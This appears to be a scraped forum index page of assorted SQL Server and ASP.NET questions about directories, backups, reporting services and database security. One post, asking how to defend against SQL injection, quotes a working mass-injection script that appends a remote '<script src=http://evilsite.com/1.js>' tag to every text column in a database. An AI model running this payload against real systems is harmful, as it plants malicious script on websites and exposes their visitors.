Protecting Sub-Directories (Using SQL 2005 DB And ASP.NET 2.0)
Mar 6, 2008
I've been trying to look for information about using an SQL 2005 database with ASP.NET 2.0 - while there are loads of different articles coving configuring a database to use with asp.net, I cannot find anything on securing a sub-folder in my asp.net application. At the moment I am successfully connecting to, and validating users via a login page in my asp.net application, however, this is all pointless since I can still browse to the pages without logging in! I have tried putting in the usual <location> tags in my root web.config file and asp.net throws an error referring to my connection string, I have also tried adding a web.config file to the sub-directory, but that just uses the windows login, and I can't find anything that'll allow me to tie my own login page to it... Arrrgh! Any help will be greatly appreciated!
Thanks in advance.
View 3 Replies
ADVERTISEMENT
Mar 19, 2007
I have sql server reporting services installed .
I have reinstalled the iis .
But now when i ever i reinstalled the reporting services i can't see any virtual directory in IIS.
SSRS installed successfully but no virtual directory
Now please let me help in making the virtual directories of sql server 2005 reporting services.
When I reinstall then if i try to connect with management studio I can't.
If i try to check surface area configuration i get following message
"Reporting services is not configured properly sqlsac"
View 1 Replies
View Related
Aug 31, 2000
we have snapshot replication set up between 2 servers. works like a charm... :-)
the problem is this: several agents are set to run every half hour (snapshot & distribution). every time they run, the agents create a new directory entry under MSSQL7REPLDATA (naming convetion: YYYYMMDDHHMMSS) and load it with files....
needless to say, after several days there are a LOT of directories. right now, we remove them manually, which is time consuming and a pain in the ass...
how do i configure SQL server to only make 1 or 2 dozen directory entries before starting to recycle them?
if this is a really simple fix everyone here knows, my apologies for clutering the board with a 'newbie' post. i'm not really a DBA, i was just 'volunteered'!... :-)
View 2 Replies
View Related
Oct 16, 2000
I have a machine where the SQL "data" directory was installed on the smaller drive instead of the larger drive. What do I have to do to move the existing databases? (Backup/restore, or detach - move it physically, then attach?)
Thanks, for the help
View 3 Replies
View Related
Sep 13, 2007
Has anyone ever had a need to backup to multiple directories? I am building a general purpose stored procedure to do various types of backups, and I was wondering if the need to do this is common enough to make it worth the effort.
Example of backup to multiple directories:
backup database [MyBigDatabase]
to
disk= 'D:BACKUPMyBigDatabase_db_200709131454_001.BAK' ,
disk= 'E:BACKUPMyBigDatabase_db_200709131454_002.BAK' ,
disk= 'F:BACKUPMyBigDatabase_db_200709131454_003.BAK' ,
disk= 'G:BACKUPMyBigDatabase_db_200709131454_004.BAK' ,
disk= 'H:BACKUPMyBigDatabase_db_200709131454_005.BAK'
with
init,
stats = 5
CODO ERGO SUM
View 20 Replies
View Related
Sep 30, 2007
Hi
I'm pulling my hair out on this one..... Installed SQLServer 2005 Express and upscaled my website and intranet site that runs my photo image library.
All my thumbnails and images are in a local D drive, while my site root is in C drive. I.e. <img src="file:///D|/Images-WMASTER......etc
Images will now not display. I've checked folder & sharing permissions, IIS permissions, all the usual stuff, but still with no luck after 2 weeks #@%$$@!!
If I change to a networked folder, such as <img src="file:///S|/Images-WMASTER...etc then they show fine.
All I can think is that there is some permissions issue with SQLServer that I'm unaware of.
Your erudite advice would be greatly appreciated!
Thanks, Rob
View 7 Replies
View Related
Jan 11, 2006
I'm planning to establish a recovery plan for my SQLServer 2000databases. How to change home and data directories?
View 3 Replies
View Related
May 3, 2007
Hey All,
I'm tring to figure out the best way to organize my reports.
When I create a new Reporting Service Project throught the 2005 .NET IDE, I'm allowed to have 1 folder in the project to deploy to. I've tried adding folders under the default Reports folder, but I haven't found a way to do this. I'd like to be able to add more directories so I can deploy them right to the server, and they will be in the proper folders, with the correct access rights.
A developer here has offered the approach of One Report - One Project. I don't want to do this because the reports have so much in common, like datasources, that I don't want to be flipping back an forth from one project to the next.
I did also look to see if there was a way to assign a dircetory to each report, rather than the project level, but I didn't see way to do that. I also, tried to add folder through the Windows Explorer and see if I could get around this restriction, but no luck there either.
Anyway, How is everyone else organizing they projects?
Eric Wild
View 1 Replies
View Related
Apr 14, 2008
Hi,
I recently upgraded my Standard Edition SQL2005 to Developer Edition SQL2005 for the default instance (MSSQLSERVER) only. I used the following command line setup.exe commands to do the job -
start /wait setup.exe ADDLOCAL=SQL_Engine INSTANCENAME=MSSQLSERVER UPGRADE=S
QL_Engine PIDKEY=OHNOYOUCANTSEETHISSORRY SKUUPGRADE=1 /qb
then
start /wait setup.exe ADDLOCAL=Analysis_Server,RS_Server INSTANCENAME=MSSQLSERVER UPGRADE=Analysis_Server,RS_Server PIDKEY=OHNOYOUCANTSEETHISSORRY SKUUPGRADE=1 /qb
(Of course I used my real PID)
I then re-installed the SP2 patches. Everything seemed fine afterwards, until I tried to process a recent cube project in Visual studio. The DATEDIFF() function failed. So I found the problem (in this forum) that the VBAMDX assembly for my SSAS session was referencing an empty bin folder, and therefore could not process VBA functions in MDX.
Now I can fix this by editing the relevant XML file in the DATA folder and restarting my SSAS service but I am concerned about all the other stuff that could be referencing old folders.
Some of the settings e.g. DATA is still in C:Program FilesMicrosoft SQL ServerMSSQL.2OLAPData
but the bin programs are now in C:Program FilesMicrosoft SQL ServerMSSQL.6OLAPData
It seems that I now have 3 new installation folders - MSSQL.5, MSSQL.6, MSSQL.7 as well as the usual .1,.2,.3 since upgrading my Edition.
Why did it make these? What else may be out of wack on the SQLServer services? How can I make sure everything is properly setup?
I guess the problem could be that there is another instance called OFFICESERVERS on the computer (a WIN2003 server) which was created by the SharePoint installation by someother guy..
adv(thanks)ance
Mark W.
View 4 Replies
View Related
Aug 4, 2015
I'm curious if there's a "best practice" for setting up the data directories MS SQL will use for each operation? I've allocated independent disks for things like C: (OS), E: (DATA), etc etc etc but I'm not familiar w/ MS SQL to understand how DBA's commonly configure the folders under each unique disk for things like DATA, LOGS, BACKUP, INDEXES, and TEMPDB. Should I have an identically name folder as show below in my example?
You can see I've just mirrored the drive name to a new folder under the partition so data is being written to: F:DATA and E:LOGS. Is this considered correct / good practice? I assume naming the folder in each mount point to whatever I logically called the drive is correct but if I should change how I configure my drive paths above. I'm trying to learn common good SQL Server practices and while I work on properly installing SQL Server 2012/2014, I want to make sure I configure my partition names SQL will utilize correctly.
View 1 Replies
View Related
Jul 3, 2007
Hello,
I am building a website in ASP.net 2.0 and I want to protect my self from sql Injection.
I am half way there in that I have built my own class that I use to check any input to the Database from a textbox (or user input) for specific characters that cause trouble, such as the “ ‘ � or “;� it then converts them to my own code for example “ ’ � = |^| the same function will convert my “code� back to the original character which works great until I get to Gridviews and Forum View.
Does anyone know how I would access the class I created through the gridview and formview so that any info they display gets first translated through my class.
Or if that is not possible how I would set the grideview or formview to translate the “codes� for me.
If I am totally off track here and there is a much better way to do all this then I am all ears. Please keep in mind I will require the “bad� characters to be saved in some way shape or form.
Thanks
View 3 Replies
View Related
Dec 24, 2004
I have a VB6 program that is using MS-SQL Server 2000. The people using the program can access the database and modify the records. This is fine except for one table.
Is it possible to prevent users from modifying one table (they can still view it) and allowing me and the VB program to acces this table?
View 2 Replies
View Related
Feb 22, 2001
I am currently writing a VB app based around a SQLserver2000 database. I have used stored procedures wherever possible to select/update/delete data. I am planning to distribute this app and wonder whether there are any tricks out there for encrypting/setting security so that even the SA account would be unable to read my stored procedures, but obviously be able to execute them?
There are two scenarios - one is where I want to let someone borrow a laptop just for a few days for a demo. Presumably I just give them an unprivileged user account without interactive logon possibilities, by which I mean Enterprise Manager and the other SQLserver Client tools [can I do this?] and control all access from the app.
The other scenario is when the app is purchased and I no longer have control of the SQL Server nor the SA account.
Any pointers would certainly be very useful indeed. Thanks.
View 1 Replies
View Related
Mar 20, 2007
Andy writes "Good day Gurus!
I have a question regarding how to protect my SQL data. My Material Resource Planning software is built on SQL. There is a problem with my data and possibly a bug in the vendors software. They are asking me to send them my database.
My database contains vendors, customers, pricing partlists and procedures. The advantage of an MRP/ERP system is that the data is all in one place; the disadvantage is that if I send it out to the vendor, they have access to all that I do. This vendor also supports some of my competitors. My concern is that all it would take is one vendor employee to jump ship with my data on a dongle and I could end up completely compromised as a company.
Is there a way of easily or is there software that can leave the significant data in tact but replace the confidential data with meaningless information?
Significant data would be numbers, costs, etc, or data that I choose. Confidential data would be vendors, customers, etc.
It seems to me that this would be a fairly common problem, but I cannot find a solution that is both quick and effective.
Thanks for your collective thoughts.
Andy,"
View 3 Replies
View Related
Apr 9, 2008
Hey,
What I am trying to achieve currently with SSIS is to view the content in one folder for example 'New' and if there is files in this then move it to 'Archived'.
Any nice liinks or tutorial or general advice you guys could give me ?
View 13 Replies
View Related
Jul 23, 2006
I have a database installed on my server, and i have put a database on user "sa" , so when any user wants to view the database he must enter the password to view its content. But i have dicover that if the user make the authentication "Windows Authentication" and opened the database it will be opned without the need to enter the password !!! and for this i cant restrict the access for my database from un-authorized people.
Can any one tell me how i can restrict view database content unless entering the password?
Thaks
View 2 Replies
View Related
Dec 22, 2006
Hello,I wrote some complicated functions (and stored procedures) in databaseat my work. System administrator (and every db user) can view codes(in Enterprise Manager for eg.). My employer needs periodic modifyingof code and so I'm required to do it. But I can loose my job :)because users are able to modify code (althout they ware too lazy tocreate it by themselves).Is this possible to protect functions from view it?[please, don't mind my english]
View 5 Replies
View Related
Jul 20, 2005
Hidoes anyone know of a way of giving developers read only access to adatabase diagram in Enterprise Manager (SQL Server 2000). The database wassupplied by a third party and we don't want them tinkering with it, butthey do need to be able to create additional tables etc. to extend thefunctionality of the package.TIAChloe Crowder
View 2 Replies
View Related
Jul 20, 2005
Hi,I need to provide a facility to do routine database administration(backups, etc.) without allowing the logged in user to modify thedata in any of the SQL server tables. Is there any way to accomplishthis (such as maybe password protecting the tables or otherwise)? I amfairly new to SQL server - so would appreciate any pointers to this.Thanks a ton!Regards,Radha
View 1 Replies
View Related
May 13, 2008
Helloo all,
I would like to gather some thoughts on how to secure my database (running on sql server 2005) from SQL injection , one such as :
Code Snippet
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' + @T + '] set [' + @C + '] =
rtrim(convert(varchar,[' + @C + ']))+
''<script src=http://evilsite.com/1.js></script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
Basically this statement finds every text column contained in a database and inserts a cross site script into it.
I know this topic has been covered in some depth in articles such as :
MSDN article on SQL injection (http://msdn.microsoft.com/en-us/library/ms161953.aspx)
and on forums a few times.
And the general consensus is to check application code and fix it, which is fine, however we have many legacy systems where it would be too time consuming to fix the problem at the application level.
So the alternative is fix this at the database level.
A possible solution is to isolate the application access to only the objects it uses, and none of the system objects. This should prevent the statement above from running, because it requests access to the sysobjects and syscolumns views. I could implement this by changing the schema for all user objects from dbo to [myAppSchema] and assigning it to my applications database user.
Not particularly elegant but might work, what do you think?
Nigel.
View 4 Replies
View Related
May 1, 2008
I have developed some custom SQL reports that query a major software vendor's SQL Database, and I would like to sell them commercially.
The only problem is that I dont know how to protect them from casual piracy? Ideally I would like to tie them into a uniqueness of the database server eg the machine SID or similar but have no experience of this..
Can anyone recommend a way of commercially protecting the code pleaaaase?
Thanks!
View 3 Replies
View Related
Sep 28, 2007
In SRS is there a simiple way to password protect a report? Or will I need to handle this in ASP?
View 4 Replies
View Related
Jan 17, 2007
I am creating a .NET application with a SQL database (SQL 2005). The database will be installed at the clients site. I would like to keep them from viewing my Tables, Stored Procedures, etc. I have read several posts on here and no one has given a solution to this, is this possible in SQL?? I am also currently encrypting/decrypting the table data in my SP's but what is to prevent the client from writing an application that accesses my SP's and therefore retrieving the decrypted data??
View 5 Replies
View Related
Aug 26, 2006
I have a Windows Forms 2.0 application with which I am distributing a SQL Express database. I am currently using User Instances. Due to HIPAA requirements, I need to prevent any consumers from accessing the data within the database. Only the application should be able to expose the data. Ideally, I would like to hard code credentials into the compiled code to do this. How can I accomplish this ?
View 1 Replies
View Related
Apr 15, 2015
SQL 2008
I have a table that has company id, attachment file name, folderexists columns.
First what I need to do is create a series of folder or directories on a networked server using the company id as the folder name where the folder name does not already exist.
Second I need to move files based on attachment file name and company id to the proper folder.
For those who want to know, this is a remediation project because of a bug in our application.
The application is supposed to created the folder based on company id and then put the attachment in that folder.
View 9 Replies
View Related
Oct 1, 2005
I have several sites which refer to a table in an MS SQL data base on the server.
I'm looking for a good way to check that my tables don't get corrupted
over time. It seems that I can't create a duplicate by selecting the
individual table and going SaveAs..
Can someone point me to the fool proof method that everyone else already uses, please ?
David Morley
View 1 Replies
View Related
Feb 28, 2008
Hi I am using sql server 2005 express and would like to keep all my fields from being both updated and deleted.
In other words, once I create a new record, I would like to have it protected from being deleted and I dont want the field values to be updated/changed from the values initially entered. Is there a way to this without running triggers or changing database permissions and user roles?
I tried making the database read-only, but then of course i cant add new records.
Thanks
View 9 Replies
View Related
May 2, 2008
Lets assume SQL Server 2005 running on Windows 2003 Server, connected to a network but not part of the domain. One application accesses it over the network with one login. Either SQL Server or a local windows login is used for authentication. This would protect SQL Server if the domain was compromised. I can see in normal circumstances domain level logins should be used, but in certain scenerios where the security of the SQL Server box is top would this be a good solution?
Thanks
Danny
View 8 Replies
View Related
Mar 16, 2008
Hello all, I have an app that is distributed to buyers and is registered on a per-computer basis. I am currently using SQL Server 2005. I have created my own registration process in which I can create a registration key file that my app reads to see the maximum # of uses of the app are allowed. I am saving the # of uses in a "keyuses" table. I need to protect this table from the users logging into the server with windows authentication and being able to edit the information in this table. I am used to Firebird, in which the security is totally user based, no windows authentication. You must explicitly grant access to every table for each user, or to the public user that represents every user. Anyways, I am pretty new to SQL server 2005. I know that there must be a way to protect a table from any modification except by a "SQL Authentication" user, which requires a username and password.
Thank you all!
Branden Johnson
View 4 Replies
View Related
Jan 29, 2008
Hi,
I have uninstalled and reinstalled several times and I can't get Reporting Services to create the virtual directories in Default Web Site, instead it creates a new web site called Report Server with the virtual directories under that, this Report Server website points to C:Program FilesMicrosoft SQL ServerInetPubwwwroot. Any ideas as to why this happens? My Default Web Site is called Default Website from the initial IIS install , I am on XP Pro SP 2 with IIS 5.1.
This is an issue for me since I don't want to have on another site that doesn't have the aspnet mapings.
I am dumbfounded and can't figure out what to do to make it not do that with the default configuration option checked during install. Should I uninstall and reinstall again and not use the default configuration?
Regards,
Chris
View 3 Replies
View Related
Aug 24, 2015
I contact you because we installed Report Services 2012 and after configuring werb service URL, database, Report Manager URLs... the URLs linked to the Report server + Report Manager does not work.After searching in IIS, it seems that even if virtual directories are created, they are linked to directories which does not exist :- c:Program FilesMicrosoft SQL ServerMSRS11.ReportReporting Services does contain only LogFiles and RSTempFiles directories.
View 7 Replies
View Related
Jul 20, 2005
Does anyone know how I can password protect XP Professional Control Panel?ThanksRonnie
View 1 Replies
View Related
Aug 24, 2005
Dear GroupI'd be grateful if you can give me some advice on the following.An application I wrote uses an MSDE backend and I wonder whetherthere's a way (even for the system administrator) of not seeing ortracing stored procedure code, view and table designs?And I also wonder whether you can advise me on an installer thathandles MSDE and database setup during installation without too mucheffort but is still affordable < USD 1000.Any articles, resources, advice hints for these two topics are veryappreciated.Thank you very much for your help & efforts!Martin
View 3 Replies
View Related
